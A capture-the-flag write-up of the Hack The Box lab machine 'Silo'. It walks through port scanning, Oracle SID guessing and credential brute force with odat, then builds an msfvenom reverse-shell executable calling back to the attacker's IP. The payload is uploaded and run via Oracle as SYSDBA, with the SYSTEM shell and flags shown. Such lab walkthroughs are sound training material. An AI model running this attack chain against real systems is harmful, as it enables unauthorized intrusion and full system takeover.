Silo
Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.82 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Wed Mar 9 10:01:38 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.82
Warning: 10.10.10.82 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.82
Host is up (0.050s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
8080/tcp open http-proxy
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
# Nmap done at Wed Mar 9 10:01:55 2022 -- 1 IP address (1 host up) scanned in 17.85 seconds
As we see, there are a lot of ports open. Let's try to obtain more information about the services and versions running on those ports.
nmap -sC -sV -p80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162 10.10.10.82 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Wed Mar 9 10:04:10 2022 as: nmap -sCV -p80,135,139,445,1521,5985,8080,47001,49152,49153,49154,49155,49159,49160,49161,49162 -oN targeted 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Oracle XML DB Enterprise Edition httpd
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 400 Bad Request
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-03-09T09:06:20
|_ start_date: 2022-03-09T07:34:37
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 9 10:06:22 2022 -- 1 IP address (1 host up) scanned in 132.05 secondsIf we enumerate the SMB service with crackmapexec, we'll see the machine is a Windows Server 2012 R2 Standard 9600 x64.
crackmapexec smb 10.10.10.82
SMB 10.10.10.82 445 SILO [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)Exploitation
In port 1521 there is an Oracle TNS listener. We can enumerate Oracle with the odat tool. It is a bit tedious to install it, but let's do it. First, let's clone it's Github repository.
git clone https://github.com/quentinhardy/odat
Then we'll go to the odat/ directory and execute the following commands.
cd odat/
git submodule init
git submodule update
Now, we'll have to install some libraries.
sudo apt-get install libaio1 python3-dev alien python3-pip
As we saw with crackmapexec, the machine has a x64 bit architecture. So we'll go to this website and download the following files.
Now that we have all these .rpm files, we will have to use alien to convert them to .deb file.
alien --to-deb *.rpm
Once we have the .deb files, we'll install them with dpkg.
dpkg -i *.deb
Next, let's install a python module.
pip3 install cx_Oracle
Then, we'll export some environment variables.
export ORACLE_HOME=/usr/lib/oracle/21/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH
Then, install some more libraries and modules.
apt-get install python3-scapy
pip3 install colorlog termcolor pycrypto passlib python-libnmap
pip3 install argcomplete && sudo activate-global-python-argcomplete
And finally, we could run the odat tool.
If an error appears saying that a module is missing, you can always search for it on the internet.
python3 odat.py --help
usage: odat.py [-h] [--version]
{all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
...
_ __ _ ___
/ \| \ / \|_ _|
( o ) o ) o || |
\_/|__/|_n_||_|
-------------------------------------------
_ __ _ ___
/ \ | \ / \ |_ _|
( o ) o ) o | | |
\_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------
By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
positional arguments:
{all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
Choose a main command
all to run all modules in order to know what it is possible to do
tnscmd to communicate with the TNS listener
tnspoison to exploit TNS poisoning attack (SID required)
sidguesser to know valid SIDs
snguesser to know valid Service Name(s)
passwordguesser to know valid credentials
utlhttp to send HTTP requests or to scan ports
httpuritype to send HTTP requests or to scan ports
utltcp to scan ports
ctxsys to read files
externaltable to read files or to execute system commands/scripts
dbmsxslprocessor to upload files
dbmsadvisor to upload files
utlfile to download/upload/delete files
dbmsscheduler to execute system commands without a standard output
java to execute system commands
passwordstealer to get hashed Oracle passwords
oradbg to execute a bin or script
dbmslob to download files
stealremotepwds to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137)
userlikepwd to try each Oracle username stored in the DB like the corresponding pwd
smb to capture the SMB authentication
privesc to gain elevated access
cve to exploit a CVE
search to search in databases, tables and columns
unwrapper to unwrap PL/SQL source code (no for 9i version)
clean clean traces and logs
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exitTo perform any attack with odat, we'll need a SID. So we could use the sidguesser option to discover valid SIDs.
python3 odat.py sidguesser -s 10.10.10.82
-sserver.
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ##################################################################################################################################################################### | ETA: 00:00:00 It found XE as a valid SID. Now we could try to brute force credentials with the passwordguesser option. I will be using the /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt metasploit dictionary. But, if you look at the dictionary, you'll see that it has the user password format. But odat only accept the user/password format. So let's change the dictionary format.
cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | tr ' ' '/' > dictionary
Now we could brute force credentials with odat.
python3 odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file dictionary
-sserver.-doracle System ID (SID).--accounts-filefile containing Oracle credentials.
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
12:36:22 WARNING -: The line 'jl/jl/\n' is not loaded in credentials list: ['jl', 'jl', '']
12:36:22 WARNING -: The line 'ose$http$admin/invalid/password\n' is not loaded in credentials list: ['ose$http$admin', 'invalid', 'password']
The login brio_admin has already been tested at least once. What do you want to do: | ETA: --:--:--
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:06:14
[!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:05:25
[!] Notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:03:44
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:02:55
[!] Notice: 'dip' account is locked, so skipping this username for password######## | ETA: 00:02:49
[!] Notice: 'system' account is locked, so skipping this username for password############################################### | ETA: 00:01:52
[!] Notice: 'xdb' account is locked, so skipping this username for password####################################################################################### | ETA: 00:01:04
[!] Notice: 'outln' account is locked, so skipping this username for password################################################################################################## | ETA: 00:00:49
[+] Valid credentials found: scott/tiger. Continue... ############################################################################################################################################################# | ETA: 00:00:09
100% |######################################################################################################################################################################################################################| Time: 00:03:58
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tigerIt found the user scott and the password tiger. Now that we have some valid credentials, we could upload files with the utlfile option. Let's create a malicious binary with msfvenom which will send us a reverse shell.
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.5 lport=4444 -f exe -o shell.exe
-pindicates the type of payload.lhostlocal host IP.lportlocal port of the listener.-foutput format.-osave the output to a file.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exeNow, let's upload it to the machine with odat in the /Temp directory.
python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile /Temp shell.exe shell.exe
-sserver.-doracle System ID (SID).-Uoracle username.-Poracle password.--putFileput a file to the remote database server.
[1] (10.10.10.82:1521): Put the /home/alfa8sa/HTB/machines/silo/shell.exe local file in the /Temp folder like shell.exe on the 10.10.10.82 server
[-] Impossible to put the /home/alfa8sa/HTB/machines/silo/shell.exe file: `ORA-01031: insufficient privileges`We get an error saying that we have insufficient privileges. Don't worry, we can user the --sysdba option to connect as the DBA system user.
python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile /Temp shell.exe shell.exe --sysdba
-sserver.-doracle System ID (SID).-Uoracle username.-Poracle password.--putFileput a file to the remote database server.--sysdbaconnection as SYSDBA.
[1] (10.10.10.82:1521): Put the /home/alfa8sa/HTB/machines/silo/shell.exe local file in the /Temp folder like shell.exe on the 10.10.10.82 server
[+] The /home/alfa8sa/HTB/machines/silo/shell.exe file was created on the /Temp directory on the 10.10.10.82 server like the shell.exe fileNow that the binary is uploaded, we want to execute it. We can do it with the externaltable option. But first, let's set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
The following command will execute the shell.exe binary, and we will catch the reverse shell on the netcat listener.
python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec /Temp shell.exe --sysdba
-sserver.-doracle System ID (SID).-Uoracle username.-Poracle password.--execexecute a system command on the remote system.--sysdbaconnection as SYSDBA.
[1] (10.10.10.82:1521): Execute the shell.exe command stored in the /Temp pathAs we get the shell as the nt authority\system user, all we have to do is reap the harvest and take both the user flag, and the root flag.
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49184
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type \users\phineas\desktop\user.txt
type \users\phineas\desktop\user.txt
ad6364c9113c9f1e283264078a94925c
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
8800ec7febdb70445e705e31dc7c0c33Last updated
Was this helpful?